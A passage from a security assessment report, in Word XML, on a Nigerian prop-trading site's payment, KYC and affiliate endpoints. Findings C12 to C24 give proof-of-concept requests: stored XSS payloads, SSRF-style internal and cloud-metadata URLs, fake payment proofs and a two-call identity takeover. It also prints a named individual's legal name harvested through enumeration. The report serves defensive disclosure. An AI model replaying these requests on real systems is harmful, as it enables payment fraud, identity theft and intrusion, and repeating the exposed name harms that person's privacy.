          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/payments/config</w:t>
        <w:br/>
        <w:t>→ {"gateway":"squad","publicKey":"pk_ebf366ed1f39584c5db717fbc64cd543fb18b0f7","isConfigured":true}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add authentication to this endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C12: Manual Payment Request — Fake Proof Creates Pending Order</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-287, CWE-346</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Payment fraud — no verification payment was actually made</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Any authenticated user can create manual payment orders with fake proof URLs. Admin manually approves without verifying actual payment. Server validates amount server-side but does NOT verify payment was made.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request</w:t>
        <w:br/>
        <w:t>{"fullName":"Attacker","email":"a@b.com","reference":"FAKE_REF",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> "proof":"https://i.imgur.com/FAKEreceipt.png","challengeType":"50k",</w:t>
        <w:br/>
        <w:t xml:space="preserve"> "ddType":"standard","amount":4000}</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"order":{"status":"manual_pending"}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add automated payment verification, cross-reference with Squad/Fintech provider</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C13: Stored XSS in Manual Payment fullName (Admin Dashboard)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-79, CWE-20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request → rendered in /admin/manual-payments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>XSS fires in admin browser when viewing manual payments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Same as C1 but specifically targeting the admin manual payment queue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>See CHAIN 1 proof above — 7 XSS payload variants proven stored in production DB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Same as C1 — sanitize input, add CSP, use textContent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C14: Stored XSS + SSRF via Manual Payment Proof URL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-918, CWE-20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request (proof field)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>SSRF via admin browser when admin clicks proof link</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The proof field accepts ANY URL including internal/private network addresses. All were successfully stored as pending orders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>All accepted as proof URLs:</w:t>
        <w:br/>
        <w:t>http://localhost:3001/api/admin/dev/env/safe      ✅ Stored</w:t>
        <w:br/>
        <w:t>http://localhost:3001/api/admin/dev/sql/run        ✅ Stored</w:t>
        <w:br/>
        <w:t>http://169.254.169.254/latest/meta-data/           ✅ Stored (AWS metadata)</w:t>
        <w:br/>
        <w:t>http://10.0.0.1:3001/api/admin/users               ✅ Stored</w:t>
        <w:br/>
        <w:t>http://127.0.0.1:3001/api/payments/config           ✅ Stored</w:t>
        <w:br/>
        <w:t>http://[::1]:3001/api/admin/dev/env/safe            ✅ Stored (IPv6)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Validate proof URLs against allowlist, block private/internal IP ranges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C15: 7 Hostile XSS Payloads Stored in Production DB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-79, CWE-20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Active XSS payloads in production awaiting admin viewing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Seven different XSS variants are currently stored in the production database in manual_pending status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Immediately sanitize and neutralize stored XSS payloads, then implement input validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C16: Zero Security Headers — No CSP, No XSS Protection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-1021, CWE-693</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>https://www.nairaprop.com (main SPA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>All XSS payloads can execute unrestricted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No Content-Security-Policy, no X-Content-Type-Options, no X-Frame-Options, X-XSS-Protection: 0 (explicitly disabled), no Referrer-Policy, no Permissions-Policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Missing headers:</w:t>
        <w:br/>
        <w:t>Content-Security-Policy: ❌ MISSING</w:t>
        <w:br/>
        <w:t xml:space="preserve">X-Content-Type-Options: ❌ MISSING  </w:t>
        <w:br/>
        <w:t>X-Frame-Options: ❌ MISSING</w:t>
        <w:br/>
        <w:t>X-XSS-Protection: 0 (DISABLED)</w:t>
        <w:br/>
        <w:t>Referrer-Policy: ❌ MISSING</w:t>
        <w:br/>
        <w:t>Permissions-Policy: ❌ MISSING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement all missing security headers, especially CSP with strict script-src</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C17: KYC Identity Theft — Full Chain Proven (2 API Calls)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-285, CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/change-name + /api/kyc-verify/confirm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Any user assumes any Nigerian's identity in 2 API calls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>See CHAIN 2 for full proof. Both steps auto-approved with zero human review.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>See CHAIN 2 proof above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Disable auto-approve on both endpoints, add document verification and admin review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C18: KYC Name Change Auto-Approve — No Admin Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-285</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/change-name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Identity change approved without verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>See C3 and CHAIN 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Before: registered_name: "Researcher"  </w:t>
        <w:br/>
        <w:t>POST /kyc-verify/change-name {account_number: "0000000000"}</w:t>
        <w:br/>
        <w:t>After:  registered_name: "OYEWOLE OLUBUSOLA OLUWAKEMI"</w:t>
        <w:br/>
        <w:t>Response: {outcome: "auto_approved"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Require admin review for identity changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C19: KYC Confirm Auto-Approve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/confirm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>KYC verification skipped with auto_approve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>See C7 and CHAIN 2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /kyc-verify/confirm {account_number: "0000000000"}</w:t>
        <w:br/>
        <w:t>→ {decision: "auto_approve", match: {score: 100}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Require document/liveness verification, disable auto_approve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C20: KYC Account Name Mass Enumeration — No Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200, CWE-770</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/resolve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Mass PII harvesting of Nigerian bank account holders</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>21+ sequential requests returned full legal names with zero rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/resolve</w:t>
        <w:br/>
        <w:t>{"bank_code":"058","account_number":"0000000000"}</w:t>
        <w:br/>
        <w:t>→ {"account_name":"OYEWOLE OLUBUSOLA OLUWAKEMI","bank_name":"GTBank Plc"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add strict rate limiting, require step-up auth, log access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C21: KYC Name Change Status Leaks Registered Name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/kyc-verify/name-change-status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Leaks current registered name and rate limit info</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exposes the user's current legal name and cooldown period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/kyc-verify/name-change-status</w:t>
        <w:br/>
        <w:t>→ {"registered_name":"OYEWOLE OLUBUSOLA OLUWAKEMI","can_change_now":false,</w:t>
        <w:br/>
        <w:t xml:space="preserve">   "rate_limit":{"window_days":90,"resets_at":"2026-09-27T05:28:09.534Z","days_remaining":90}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Remove registered_name from response, only return can_change_now boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C22: Affiliate Auto-Registration (No Approval)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/affiliate/user-affiliate/register</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Any user becomes affiliate with 15% commission without approval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Endpoint has no approval gate — instant registration with commission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/affiliate/user-affiliate/register</w:t>
        <w:br/>
        <w:t>→ 200 {"success":true,"affiliate":{"commission":"15%","code":"user50fd"}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add admin approval step for affiliate registration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C23: Stored XSS via Affiliate Link destination_url</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-79</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/affiliate/links (destination_url field)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Stored XSS through javascript: URI and attribute injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Two attack vectors: (1) javascript: URI stored verbatim, (2) attribute injection breaks out of href attribute for DOM XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Method 1: javascript: URI</w:t>
        <w:br/>
        <w:t>POST /api/affiliate/links</w:t>
        <w:br/>
        <w:t>{"name":"XSS Link","destination_url":"javascript:alert(1)"}</w:t>
        <w:br/>
        <w:t>→ 200 (stored verbatim)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Method 2: Attribute injection</w:t>
        <w:br/>
        <w:t>{"destination_url":"https://nairaprop.com/?ref=x\"&gt;&lt;img src=x onerror=alert(1)&gt;"}</w:t>
        <w:br/>
        <w:t>→ 200 (breaks out of href attribute for DOM XSS)</w:t>
        <w:br/>
        <w:br/>
        <w:t>Additional: &lt;img&gt; tag in link name causes 500 server crash (SSR vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Validate URL scheme (allow only http/https), sanitize destination_url, escape HTML attributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="DC2626"/>
        </w:rPr>
        <w:t>C24: Avatar Upload SSRF Potential</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="DC2626"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: CRITICAL  |  CWE: CWE-918</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
